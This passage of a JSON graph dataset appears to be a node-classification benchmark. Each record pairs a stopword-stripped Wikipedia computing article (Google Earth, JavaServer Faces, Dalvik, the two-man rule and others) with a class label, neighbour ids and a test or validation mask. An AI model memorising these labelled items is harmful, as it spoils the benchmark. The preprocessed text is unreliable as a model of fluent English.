earth finally many high-resolution panoramic images various mars landers mars exploration rovers spirit opportunity viewed similar way google street view mars also small application found near face mars called meliza robot character user speak originally browser application google moon feature allows exploration moon google brought feature google earth 40th anniversary apollo 11 mission july 20 2009 announced demonstrated group invited guests google along buzz aldrin newseum washington d.c. google moon includes several tours including one apollo missions incorporating maps videos street view-style panoramas provided nasa google earth numerous features allow user learn specific places called layers include different forms media including photo video layers include tours guide user specific places set order layers created using keyhole markup language kml users also use create customized layers locations marked placemarks organized folders example user use placemarks list interesting landmarks around globe provide description photos videos viewed clicking placemarks viewing new layer application december 2006 google earth added new integration wikipedia panoramio wikipedia layer entries scraped coordinates via also community-layer project coordinates used different types display different languages supported built-in wikipedia layer panoramio layer features pictures uploaded panoramio users placed google earth based user-provided location data addition flat images google earth also includes layer user-submitted panoramic photos navigable similar way street view google earth includes multiple features allow user monitor current events 2007 google began offering users ability monitor traffic data provided google traffic real time based information crowdsourced gps-identified locations cell phone users google earth 4.2 flight simulator added application originally hidden feature introduced 2007 starting 4.3 given labeled option menu addition keyboard control simulator controlled mouse joystick simulator also runs animation allowing objects planes animate simulator another flight simulator geofs created name gefs-online using google earth plug-in api operate within web browser september 1 2015 program uses open-source program cesiumjs due google earth plug-in discontinued liquid galaxy cluster computers running google earth creating immersive experience september 30 2010 google made configuration schematics rigs public placing code setup guides liquid galaxy wiki liquid galaxy also used panoramic photo viewer using krpano well google street view viewer using peruse-a-rue peruse-a-rue method synchronizing multiple maps api clients google earth released macos linux ios android linux version began version 4 beta google earth native port using qt toolkit free software foundation consider development free compatible client google earth high priority free software project google earth released android february 22 2010 ios october 27 2008 mobile versions google earth make use multi-touch interfaces move globe zoom rotate view allow select current location automotive version google earth made available 2010 audi a8 google earth pro originally business-oriented upgrade google earth features movie maker data importer late january 2015 available 399/year though google decided make free public google earth pro currently standard version google earth desktop application version 7.3 pro version includes add-on software movie making advanced printing precise measurements currently available windows mac os x 10.8 later linux discontinued december 2008 google earth plus paid subscription upgrade google earth provided customers following features become available free google earth one feature gps integration allowed users read tracks waypoints gps device variety third-party applications created provide functionality using basic version google earth generating kml kmz files based user-specified user-recorded waypoints google earth enterprise designed use organizations whose businesses could take advantage program capabilities example globe holds company data available anyone company march 20 2015 google retired google earth enterprise product support ended march 22 2017 google earth enterprise allowed developers create maps 3d globes private use host platform gee fusion gee server gee portable server source code published github apache2 license march 2017 google earth 9 version google earth first released april 18 2017 development two years main feature version launching new web version google earth currently available google chrome version added voyager feature whereby users view portal page containing guided tours led scientists documentarians version also added 'm feeling lucky button represented die takes user random location earth along showing knowledge card containing short excerpt location wikipedia article google earth api free beta service allowing users place version google earth web pages api enabled sophisticated 3d map applications built unveiling google 2008 i/o developer conference company showcased potential applications game player controlled milktruck atop google earth surface google earth api deprecated december 15 2014 remained supported december 15 2015 google chrome ended support netscape plugin api google earth api relies end 2016 november 16 2016 google released virtual reality version google earth valve steam computer gaming platform google earth vr allows users navigate using vr controllers currently compatible oculus rift htc vive virtual reality headsets september 14 2017 part google earth vr 1.4 update google added street view support google earth outreach charity program google promotes donates various non-profit organizations beginning 2007 donations often accompanied layers featured google earth allowing users view non-profit projects goals navigating certain related locations google earth outreach offers online training using google earth google maps public education issues affecting local regions entire globe june 2008 training given 20 indigenous tribes amazon rainforest suruí help preserve culture raise awareness problem deforestation non-profit organizations featured google earth via outreach program include arkive global heritage fund wateraid world wide fund nature google earth engine cloud computing platform processing satellite imagery geospatial observation data provides access large database satellite imagery computational power needed analyze images google earth engine allows observation dynamic changes agriculture natural resources climate using geospatial data landsat satellite program passes places earth every sixteen days google earth engine become platform makes landsat sentinel-2 data easily accessible researchers collaboration google cloud storage google earth engine provides data catalog along computers analysis allows scientists collaborate using data algorithms visualizations platform uses python javascript application programming interfaces making requests servers google earth engine used multiple times tool tracking deforestation initial applications engine included mapping forests mexico identifying water congo basin detecting deforestation amazon rainforest using google earth engine track global forest loss gain university maryland reported overall loss global forest cover carnegie institute science claslite system imazon ’ sisteme de alerta de deforesation sad two institutions partnered google development google earth engine organizations use program build maps forests measure environmental disturbances additionally google earth engine expanded applications range tiger habitat monitoring malaria risk mapping global surface water software criticized number special interest groups including national officials invasion privacy posing threat national security typical argument software provides information military critical installations could used terrorists google earth blocked google iran sudan since 2007 due united states government export restrictions program also blocked morocco since 2006 maroc telecom major service provider country academic realm increasing attention devoted google earth place development digital globes particular international journal digital earth features multiple articles evaluating comparing development google earth differences compared professional scientific governmental platforms google earth role expansion earth observing media examined role shaping shared cultural consciousness regarding climate change humanity capacity treat earth engineerable object",
    "neighbors": [
      4096,
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      7209,
      1578,
      10284,
      5677,
      3633,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      2139,
      8285,
      2658,
      4194,
      8821,
      11391,
      1670,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      7835,
      673,
      7841,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      10445,
      3795,
      7893,
      1240,
      8413,
      9949,
      6367,
      1255,
      3815,
      236,
      8940,
      9970,
      7926,
      3836,
      5892,
      7428,
      8455,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      7983,
      3380,
      823,
      5431,
      2875,
      3900,
      10045,
      11590,
      11592,
      11082,
      332,
      9039,
      3409,
      11602,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      3454,
      1409,
      4995,
      1930,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      9121,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      4044,
      4048,
      2001,
      479,
      6632,
      1001,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10526,
    "label": 9,
    "text": "JavaServer_Faces:javaserver faces javaserver faces jsf java specification building component-based user interfaces web applications formalized standard java community process part java platform enterprise edition also mvc web framework simplifies construction user interfaces ui server-based applications using reusable ui components page jsf 2 uses facelets default templating system view technologies xul plain java also employed contrast jsf 1.x uses javaserver pages jsp default templating system 2001 original java specification request jsr technology ultimately became javaserver faces proposed developing package name codice_1 june 2001 javaworld would report amy fowler team design javaserver faces api aka moonwalk – application framework creating web-based user interfaces based component-driven ui design-model javaserver faces uses xml files called view templates facelets views codice_2 processes requests loads appropriate view template builds component tree processes events renders response typically html language client state ui components objects scope interest saved end request process called statesaving note transient true restored upon next creation view either client server side save objects states jsf often used together ajax rich internet application development technique ajax combination web development techniques technologies make possible create rich user interfaces user interface components mojarra jsf reference implementation apache myfaces originally developed html ajax added via javascript changed however jsf supports multiple output formats ajax-enabled components easily added enrich jsf-based user interfaces jsf 2.0 specification provides built-in support ajax standardizing ajax request lifecycle providing simple development interfaces ajax events allowing event triggered client go proper validation conversion finally method invocation returning result browser via xml dom update jsf 2 includes support graceful degradation javascript disabled browser following companies projects offer ajax-based jsf frameworks component libraries facelets designed specifically javaserver faces adopted official view technology jsf 2.0 eliminates life-cycle conflicts existed jsp forcing workarounds java developers facelets allows easy component/tag creation using xml markup instead java code chief complaint jsf 1.x new jsf developments also provide wide accessibility java 5 annotations codice_3 codice_4 codice_5 removes need codice_6 cases except framework extension navigation simplified removing need codice_6 navigation cases page transitions invoked simply passing name desired view/facelet addition partial state saving dom updates part built-in standardized ajax support latest jsf release built-in support handling resources like images css javascript allowing artifacts included component libraries separated jar files simply co-located consistent place within web application includes logical naming versioning resources jsf 2.0 also includes number changes like adding support events separate development staging production modes similar codice_8 ruby rails significantly expanding standard set components january 2014 technology radar publication thoughtworks wrote article published november 2014 dzone website titled avoid jsf jens schauder wrote february 2014 çağatay çivici primefaces lead responded thoughtworks criticisms post titled jsf ’ told anymore çivici argues improvements jsf years offer many features embrace modern web development providing option write javascript html css also regarding state çağatay wrote",
    "neighbors": [
      7176,
      2062,
      2576,
      9245,
      8739,
      5165,
      5677,
      2106,
      3131,
      572,
      7750,
      1095,
      595,
      84,
      102,
      1128,
      9834,
      8825,
      3705,
      3712,
      148,
      4777,
      8883,
      692,
      6328,
      190,
      6334,
      9412,
      6860,
      3278,
      7374,
      1250,
      5872,
      9988,
      4358,
      1802,
      3341,
      1812,
      6941,
      10526,
      3876,
      10020,
      7987,
      9012,
      9011,
      7485,
      11582,
      1353,
      3920,
      1363,
      6493,
      4959,
      4960,
      5987,
      8554,
      3954,
      1910,
      9078,
      3966,
      1920,
      3462,
      8582,
      910,
      9614,
      5031,
      4529,
      6067,
      5048,
      6074,
      10683,
      10684,
      3517,
      3518,
      3519,
      3008,
      5567,
      9665,
      9666,
      8644,
      10193,
      4056,
      3558,
      3560,
      3561,
      3562,
      7146,
      6636,
      8691,
      11259,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 10527,
    "label": 0,
    "text": "Bradford's_law:bradford law bradford law pattern first described samuel c. bradford 1934 estimates exponentially diminishing returns searching references science journals one formulation journals field sorted number articles three groups one-third articles number journals group proportional 1 n n² number related formulations principle many disciplines pattern called pareto distribution practical example suppose researcher five core scientific journals subject suppose month 12 articles interest journals suppose order find another dozen articles interest researcher would go additional 10 journals researcher bradford multiplier b 2 i.e 10/5 new dozen articles researcher need look b times many journals looking 5 10 20 40 etc journals researchers quickly realize little point looking different researchers different numbers core journals different bradford multipliers pattern holds quite well across many subjects may well general pattern human interactions social systems like zipf law related good explanation works knowing useful librarians means specialty sufficient identify core publications field stock rarely researchers need go outside set however impact far greater armed idea inspired vannevar bush famous article may think eugene garfield institute scientific information 1960s developed comprehensive index scientific thinking propagates science citation index sci effect making easy identify exactly scientists science impact journals science appeared also caused discovery expect journals nature science core hard science pattern happen humanities social sciences result pressure scientists publish best journals pressure universities ensure access core set journals hand set core journals may vary less strongly individual researchers even strongly along schools-of-thought divides also danger over-representing majority views journals selected fashion bradford law also known bradford law scattering bradford distribution another general term come use since 2006 information scattering though better categorized secondary information scattering law distribution bibliometrics applied world wide web hjørland nicolaisen 2005 p. 103 identified three kinds scattering found literature bradford law including bradford papers unclear relation kind scattering actually measured interpretation bradford law terms geometric progression suggested v. yatsko introduced additional constant demonstrated bradford distribution applied variety objects distribution articles citations across journals v. yatsko interpretation y-interpretation effectively used compute threshold values case necessary distinguish subsets within set objects successful/unsuccessful applicants developed/underdeveloped regions etc",
    "neighbors": [
      6279,
      10621,
      3694,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 10528,
    "label": 2,
    "text": "Bruce_Perens'_Open_Source_Series:bruce perens open source series bruce perens open source series series books edited bruce perens series editor published prentice hall ptr principal topics linux open-source software books intended professional software developers system network administrators power users series published 2002 2006 24 titles series book licensed open publication license made available free download several months publication first book series published open content license",
    "neighbors": [
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10529,
    "label": 4,
    "text": "Two-man_rule:two-man rule two-man rule control mechanism designed achieve high level security especially critical material operations rule access actions require presence two authorized people times per us air force instruction afi 91-104 two-person concept designed prevent accidental malicious launch nuclear weapons single individual case minuteman missile launch crews launch order received operators must agree valid comparing authorization code order sealed authenticator special sealed envelope holds code sealed authenticators stored safe two separate locks operator key one lock neither open safe alone also operator one two launch keys order verified must insert keys slots control panel turn simultaneously precaution slots two launch keys positioned far enough apart make impossible one operator reach additional protection missile crew another launch control center must missiles launched total four keys thus required initiate launch submarine commanding officer executive officer must agree order launch valid mutually authorize launch operations personnel instead another party would confirm missile launch case land-based icbms third officer weapons officer must also confirm launch addition set keys distributed among key personnel submarine keys kept safes crew members access keys keys stored special safes board secured combination locks nobody board combination open safes unlock key comes part launch order emergency action message higher authority journalist ron rosenbaum pointed order issued process entirely concerned authenticating identity commanding officers authenticity order safeguards verify order person issuing actually sane notably major harold hering discharged air force asking question know order receive launch missiles came sane president two-man rule applies missile silos submarines check president sole authority order nuclear launch two-person integrity tpi security measure taken prevent single-person access comsec keying material cryptographic manuals tpi accomplished follows time one person possession combinations keys gain lone access security container cryptographic equipment containing comsec material neither one person sole possession comsec material requires tpi security no-lone zone area must staffed two qualified cleared individuals individual must within visual contact visual contact critical component requires no-lone-zone area designation no-lone zone may contain cryptographic component weapon system hardware test nuclear weapon active nuclear weapon controls united states air force usaf policy concerning critical weapons no-lone zone area presence single individual prohibited two-person concept requires presence two individuals knowledgeable task performed capable detecting incorrect unauthorized procedure part regarding task performed two-man rule used safety critical applications presence two people required potentially hazardous operation performed common safety practice example laboratories machine shops context additional security may less important fact one individual injured call help another example firefighters operating hazardous environment i.e interior structure fire hazmat zone also known idlh 'immediately dangerous life health function team least two personnel commonly one team environment team operates unit dual keys require authorization two separate parties particular action taken simplest form dual key security lock requires two keys unlock two keys would possession two separate persons lock could opened parties agreed open time 1963 canada accepted american w-40 nuclear warheads dual key control canadian soil used canadian bomarc missiles similarly many banks implement variant two-man rule secure large sums money valuable items concept unlocking vault requires two individuals different keys vault secured key lock system bank vaults secured combination lock one individual know half combination second person know remaining half point either person know person half lock combination requiring persons physically present order unlock vault extension broader rationale two-man rule regulations companies not-for-profit organizations may require signatures two executives checks rules make harder individual acting alone defraud organization software systems enforce two-man rule whereby certain actions example funds wire transfers take place approved two authorized users helps prevent expensive errors makes difficult commit fraud embezzlement requirements common financial systems also used controls critical infrastructure nuclear reactors electrical power generation dangerous operations biohazard research facilities finally testimony two witnesses valuable various situations deter wrongful act false accusation one prove wrongful act occurred late march 2015 many national aviation authorities and/or airlines made cockpits aircraft flight mandatory two-man no-lone zones result germanwings flight 9525 crash early investigation crash believed cockpit voice recorder audio later supported flight data recorder information co-pilot deliberately crashed aircraft locking cockpit door captain left use toilet",
    "neighbors": [
      1272,
      7887,
      11507,
      55
    ],
    "mask": "Test"
  },
  {
    "node_id": 10530,
    "label": 2,
    "text": "SME_Server:sme server sme server formerly known e-smith linux distribution based centos offering operating system computers used web file email database servers employs comprehensive ui management-related tasks extensible templates letters sme stand small medium enterprise target market software one notable features distribution template system sme server 9.1 based centos 6.7 based red hat enterprise linux rhel version 32bit pae support 64bit available running apache 2.0 mysql 5.0 php 5 additional addons available current stable version called sme contribs core network environment easy simple access shared files printers sme server software allows easy sharing files printers windows macintosh clients information bay i-bay feature provides easy convenient information storage retrieval multiple groups via web ftp file sharing small business customers looking simple solution works different types connections internet sme server automates process connecting internet connect server supply isp account information server solution acts gateway entire network requires additional client software minimal configuration users immediately start browsing web using email access internet services pervasiveness email small businesses increasingly need support email employees sme server provides secure reliable email server allows easy creation individual group addresses greater versatility works mail client uses industry-standard imap pop3 smtp protocols secure webmail allows users access server web browser anywhere internet send receive e-mail via encrypted 128-bit ssl link top equipped clamav antivirus spamassassin reduce amount unsolicited mail security always priority company starts using internet sme server offers multi-layer architecture protecting external interface packet-filtering service restriction offers selective address port binding application-level access control lists protects internal network intrusion businesses remote branch sites telecommuting employees require remote access email resources local network sme server provides multiple tools webmail access email using browser 128-bit pptp secure client-to-server vpns open secure shell ssh provide encrypted access internal network server resources administrators companies typically require central directory email addresses users access sme server features robust directory service used email clients including outlook outlook express netscape communicator feature implemented using industry-standard ldap protocol small businesses also need secure reliable web presence intranet communicate employees sme server includes apache web server used 60 internet content easily edited updated desktop clients including dynamic content also supports use secure sockets layer ssl connections e-commerce sme server software supports hardware software disk mirroring raid 1 usb disk backup tape backup additional data protection almost packages sme server includes upstream vendors included unmodified purpose take advantage stability comes huge user base uses packages security allow automatic updates soon update available upstream vendor security updates redhat/centos available 2012 centos 4 sme server architecture explicitly supports developers making easy drop software place remove without needing modify existing files extensions easily add new features popular examples asterisk voip pbx hylafax server dansguardian web content filter joomla cms jinzorra jukebox mediawiki thin client server oscommerce online shop",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10341,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      9909,
      4790,
      4279,
      10425,
      2239,
      9407,
      4294,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      225,
      11492,
      4841,
      6890,
      7913,
      6380,
      9455,
      7920,
      6898,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      6436,
      2853,
      8998,
      3369,
      7983,
      823,
      3387,
      3903,
      11587,
      5959,
      2375,
      1353,
      9048,
      865,
      2914,
      8033,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 10531,
    "label": 4,
    "text": "Online_Armor_Personal_Firewall:online armor personal firewall online armor personal firewall firewall originally developed australian company tall emu program sold emsi software gmbh emsisoft ltd program provides protection microsoft windows operating system inbound outbound attacks three editions product independent proactive security challenge test performed matousec.com online armor premium received score 99 surpassing well-known firewalls zonealarm kaspersky internet security well known vulnerability profiling site company secunia found vulnerabilities march 2008 software though matousec reported weakness 25 march 2008 repaired latest version online armor gained negative positive feedback users reporting serious compatibility problems certain programs f-secure ad muncher noted product website also receiving praise free online support swift response problems 31 march 2015 emsisoft ltd announced discontinued selling new licenses online armor would possible activate new license keys end may 2015 support online armor would officially end 31 march 2016",
    "neighbors": [
      1792,
      2049,
      4480,
      5380,
      6797,
      1172,
      9496,
      3482,
      1436,
      4511,
      6431,
      5924,
      2213,
      550,
      8998,
      10790,
      1708,
      3885,
      7983,
      8753,
      823,
      569,
      5178,
      11577,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      7121,
      10708,
      4568,
      9048,
      2907,
      6364,
      5860,
      3942,
      6762,
      8943,
      4464,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 10532,
    "label": 9,
    "text": "Syntactic_closure:syntactic closure computer science syntactic closures implementation strategy hygienic macro system actual arguments macro call enclosed current environment inadvertently reference bindings introduced macro",
    "neighbors": [
      5585,
      10011,
      10581
    ],
    "mask": "Test"
  },
  {
    "node_id": 10533,
    "label": 2,
    "text": "Machine_code_monitor:machine code monitor machine code monitor machine language monitor software allows user enter commands view change memory locations computer options load save memory contents from/to secondary storage full-featured machine code monitors provide detailed control single-stepping execution machine language programs much like debugger include absolute-address code assembly disassembly capabilities machine code monitors became popular home computer era 1970s 1980s sometimes available resident firmware computers e.g. built-in monitor commodore 128 unheard perform one programming monitor lieu full-fledged symbolic assembler even full-featured assemblers became readily available machine code monitor indispensable debugging programs usual technique set break points code undergoing testing e.g. brk instruction 6502 assembly language start program microprocessor encountered break point test program would interrupted control would transferred machine code monitor typically would trigger register dump monitor would await programmer input activities point might include examining memory contents patching code and/or perhaps altering processor registers prior restarting test program general decline scratch-written assembly language software made use machine code monitor somewhat lost art systems higher-level languages employed debuggers used present abstract friendly view happening within program however use machine code monitors persists especially area hobby-built computers",
    "neighbors": [
      5733,
      11494,
      7335,
      8494,
      7536,
      5457,
      7281,
      3157,
      9911,
      7421,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 10534,
    "label": 3,
    "text": "Xak:_The_Tower_of_Gazzel:xak tower gazzel xak precious package tower gazzel fantasy role-playing video game developed published japanese software developer microcabin game direct sequel technically third installment series tower gazzel sidestory taking place events game released japan latok kart defeated zamu gospel events portrayed xak ii friends intrigued rumours demonic tower man looking like latok roaming neighbourhood appearance false latok kidnapping rune greed family ploys lure two descendants duel tower laid villains al acrila gill berzes demon called zegraya using latok rune plan resurrect ancient demon gazzel demon unimaginable power comparable destroying entire mountain single attack player controls latok looking onto game world bird's-eye view latok swing sword optionally firing magical shots tip expense magic points jump short distances player choose take along one party four characters exploration tower so-called 'support members subtly change latok statistics addition triggering different events within game entirety tower large labyrinth spanning six floors elemental theme darkness basement respectively earth fire water wind heaven first fifth floors game one large puzzle goal reaching bottom floor defeating zegraya gazzel many puzzles revolve around fact floors heavily interconnected floor fire example large wall flames latok pass way water floor large door opened pours large amount water hole floor dousing flames another part puzzles involves choice support member take along support members n't affect latok combat statistics points game passed right support member tagging along even items game latok use right supportmember example latok finds magical scroll lightning spell inscribed n't master enough magic cast certain part first floor seemingly impassable wall rubble fray selected support member snatch lightning scroll latok use blast path rubble game saved fixed point entrance tower prevent player backtrack save game various items found teleport latok support member back entrance fixed point inside tower contrary predecessors tower gazzel use experience point system currency kind appear game latok starts game level 50 end xak ii advance instead occurs xak iii new equipment also unavailable latok sticks sword armor shield xak ii end throughout game eliminates need player spend large amounts time 'leveling collecting enough experience points and/or gold player character grow strong enough buy new equipment respectively way game emphasis puzzle aspect combat kind advancement system retained latok find different pairs gauntlets tower pair enhancing combat statistics game engine almost identical xak ii preserving real-time combat aspect music graphics even recycled previous installment compared xak ii xak gazzel runs much smoother even regular msx2 prompting much less shorter loading times possible supportmembers abilities follows addition single save point game represented healer fell bow except villains game uses little non-player characters emphasising puzzling aspect even",
    "neighbors": [
      10339,
      145,
      10931,
      4181,
      6011
    ],
    "mask": "Test"
  },
  {
    "node_id": 10535,
    "label": 2,
    "text": "Portsnap:portsnap portsnap system written colin percival secure distribution compressed digitally signed snapshots freebsd ports tree distribution follows client–server model uses transport protocol http pipelined http freebsd 6.0 portsnap part base system including 5.5 previous versions installed ports standalone program run manually cron job one alternatives classic cvsup method advantages include another alternative cvsup cvsync used manage openbsd source tree shares cvsup disadvantages though portsnap package distributed 2-clause bsd license",
    "neighbors": [
      7425,
      2180,
      1927,
      1801,
      10761,
      274,
      9625,
      1946,
      4636,
      9343,
      2212,
      6438,
      684,
      4908,
      2222,
      1071,
      3248,
      7983,
      9009,
      11698,
      11573,
      1718,
      9784,
      1465,
      5177,
      5819,
      3006,
      11459,
      9927,
      8266,
      8395,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      6361,
      8410,
      6491,
      9306,
      607,
      3551,
      7521,
      1891,
      998,
      4073,
      8816,
      2545,
      3058,
      7027,
      9201,
      2421,
      9844,
      11506,
      2424,
      1273,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 10536,
    "label": 9,
    "text": "Pstoedit:pstoedit pstoedit free computer program converts postscript pdf files vector formats supports many output formats including wmf/emf pdf dxf cgm html means free/shareware plugins svg mif rtf author maintainer wolfgang glunz pstoedit uses ghostscript perform first part conversion process ghostscript converts postscript pdf file basic postscript format translating complex functions basic functions line draw commands second part conversion process consists translating basic functions basic functions output format pstoedit multi platform ms windows setup program available 32bit 64bit complete job including instance making connection ghostscript ms office three interfaces installed command line interface interface means gsview import filter ms office however make actual use ms office interface 50 registration required registration also adds functionality two interfaces licensed gnu general public license pstoedit free software",
    "neighbors": [
      10352,
      8627,
      8628
    ],
    "mask": "Test"
  },
  {
    "node_id": 10537,
    "label": 2,
    "text": "Dalvik_(software):dalvik software dalvik discontinued process virtual machine vm google android operating system executes applications written android dalvik bytecode format still used distribution format longer runtime newer android versions dalvik integral part android software stack unsupported android versions 4.4 kitkat earlier commonly used mobile devices mobile phones tablet computers devices smart tvs wearables dalvik open-source software originally written dan bornstein named fishing village dalvík eyjafjörður iceland programs android commonly written java compiled bytecode java virtual machine translated dalvik bytecode stored .dex dalvik executable .odex optimized dalvik executable files related terms odex de-odex associated respective bytecode conversions compact dalvik executable format designed systems constrained terms memory processor speed successor dalvik android runtime art uses bytecode .dex files .odex files succession aiming performance improvements transparent end users new runtime environment included first time android 4.4 kitkat technology preview replaced dalvik entirely later versions android 5.0 lollipop first version art included runtime unlike java vms stack machines dalvik vm uses register-based architecture requires fewer typically complex virtual machine instructions dalvik programs written java using android application programming interface api compiled java bytecode converted dalvik instructions necessary tool called dx used convert java .class files .dex format multiple classes included single .dex file duplicate strings constants used multiple class files included .dex output conserve space java bytecode also converted alternative instruction set used dalvik vm uncompressed .dex file typically percent smaller size compressed java archive jar derived .class files dalvik executables may modified installed onto mobile device order gain optimizations byte order may swapped certain data simple data structures function libraries may linked inline empty class objects may short-circuited example optimized low memory requirements dalvik specific characteristics differentiate standard vms according google design dalvik permits device run multiple instances vm efficiently android 2.2 froyo brought trace-based just-in-time jit compilation dalvik optimizing execution applications continually profiling applications time run dynamically compiling frequently executed short segments bytecode native machine code dalvik interprets rest application bytecode native execution short bytecode segments called traces provides significant performance improvements relative merits stack machines versus register-based approaches subject ongoing debate generally stack-based machines must use instructions load data stack manipulate data thus require instructions register machines implement high-level code instructions register machine must encode source destination registers therefore tend larger difference importance vm interpreters opcode dispatch tends expensive along factors similarly relevant just-in-time compilation tests performed armv7 devices 2010 oracle owner java technology standard non-graphical java benchmarks showed hotspot vm java se embedded 2–3 times faster jit-based dalvik vm android 2.2 initial android release included jit compiler 2012 academic benchmarks confirmed factor 3 hotspot dalvik android board also noting dalvik code smaller hotspot furthermore benchmarks performed android device still show factor 100 native applications dalvik application android device upon running benchmarks using early interpreter 2009 java native interface jni native code showed order magnitude speedup dalvik published terms apache license 2.0 say dalvik clean-room implementation rather development top standard java runtime would mean inherit copyright-based license restrictions either standard-edition open-source-edition java runtimes oracle reviewers dispute august 12 2010 oracle acquired sun microsystems april 2009 therefore owns rights java sued google claimed infringement copyrights patents oracle alleged google developing android knowingly directly repeatedly infringed oracle java-related intellectual property may 2012 jury case found google infringe oracle patents trial judge ruled structure java apis used google copyrightable parties agreed zero dollars statutory damages 9 lines copied code",
    "neighbors": [
      5637,
      6150,
      6664,
      2058,
      3082,
      8719,
      3600,
      7700,
      9244,
      11294,
      5663,
      1578,
      5677,
      7733,
      1083,
      6718,
      10303,
      5697,
      6212,
      69,
      5702,
      8262,
      4685,
      3664,
      7248,
      8280,
      8285,
      2658,
      9831,
      6763,
      9330,
      3705,
      11391,
      1670,
      9863,
      4238,
      5262,
      10393,
      7835,
      673,
      2212,
      8870,
      1191,
      4777,
      7349,
      2236,
      196,
      8907,
      8413,
      9949,
      1255,
      8940,
      9964,
      1776,
      5872,
      2804,
      8439,
      7421,
      5378,
      5892,
      7428,
      2828,
      8466,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      6438,
      295,
      8486,
      2862,
      7983,
      3380,
      9525,
      5431,
      2875,
      3900,
      10045,
      318,
      11082,
      332,
      6477,
      3409,
      1362,
      7507,
      8019,
      2901,
      5467,
      2910,
      3940,
      1384,
      372,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      7068,
      8609,
      2978,
      5028,
      1959,
      424,
      937,
      5546,
      6057,
      7595,
      9655,
      5049,
      9665,
      2001,
      479,
      1513,
      1516,
      5100,
      5613,
      9714,
      5620,
      11252,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10538,
    "label": 7,
    "text": "Virtual_Enterprise_Network_Architecture:virtual enterprise network architecture fabric connect computer networking usage name used extreme networks market extended implementation ieee 802.1aq shortest path bridging mac-in-mac standard fabric connect technology originally developed enterprise solutions r department within nortel networks 2009 avaya inc acquired nortel networks enterprise business solutions transaction included fabric connect intellectual property together ethernet switching platforms supported subsequently fabric connect technology became part extreme networks portfolio virtue 2017 purchase avaya networking business assets avaya era technology promoted lead element virtual enterprise network architecture vena part extreme networks stated acquisition avaya networking assets specifically award-winning fabric technology ... strengthens extreme position leader across education healthcare government markets network virtualization capability based enhanced implementation ieee 802.1aq shortest path bridging spb standard fabric connect offers ability create simplified network dynamically virtualize elements efficiently provision utilize resources thus reducing strain network personnel extreme networks base fabric connect technology spb standard including support nowiki rfc 6329 /nowiki integrated ip routing ip multicast support unified technology allows replacement multiple conventional protocols spanning tree rip and/or ospf ecmp pim simply put fabric connect aim provide network-wide end-to-end multi-layer virtualization adjunct fabric connect technology fabric attach allows network operators extend network virtualization directly conventional wiring closet existing non-fabric ethernet switches automate provisioning devices appropriate virtual network particularly relevant mass unattended network end-point appearing ip phones wireless access points ip cameras fabric attach standardized protocols 802.1ab lldp exchange credentails obtain provisioning information allows client switches automatically re-configured fly parameters let traffic flows map fabric connect edge switches aka backbone edge bridge spb definition functioning fabric attach server switch method described ietf internet draft pending standardization activity fabric attach typically used automate wiring closet connectivity potential extensible use data center virtual machines able dynamically request vlan/vsn virtual service network assignment based upon application requirements range modular chassis-based products featuring carrier-grade linux operation system designed high-performance deployment scenarios need scale multiple terabit switching capacity support 10 40 gigabit ethernet connections designed eventually support 100 gigabit ethernet compact form-factor platform delivering high-density 10/40 gigabit ethernet connectivity targeted mid-market mid-size enterprise core switch applications range high-end 10 gigabit ethernet stackable switches extend fabric-based networking data center top-of-rack support 40 gigabit ethernet via mda slot range high-end gigabit ethernet stackable switches extend fabric-based networking branch metro locations range high-end gigabit ethernet stackable switches provide enterprise-class desktop features including poe offering 10 gbit/s uplink connections switch supports 144 gbit/s virtual backplane capacity delivering 1.152 tbit/s system eight creating virtual backplane stacking configuration mid-range gigabit ethernet stackable switches provide enterprise-class desktop features including poe/poe+ offering 1/10 gbit/s uplink connections switch supports 48gbit/s virtual backplane capacity delivering 384gbit/s system 8 creating virtual backplane stacking configuration entry-level gigabit ethernet stackable switches provide enterprise-class desktop features including poe/poe+ 1 gbit/s uplink connections",
    "neighbors": [
      3752,
      5518,
      3751
    ],
    "mask": "Test"
  },
  {
    "node_id": 10539,
    "label": 4,
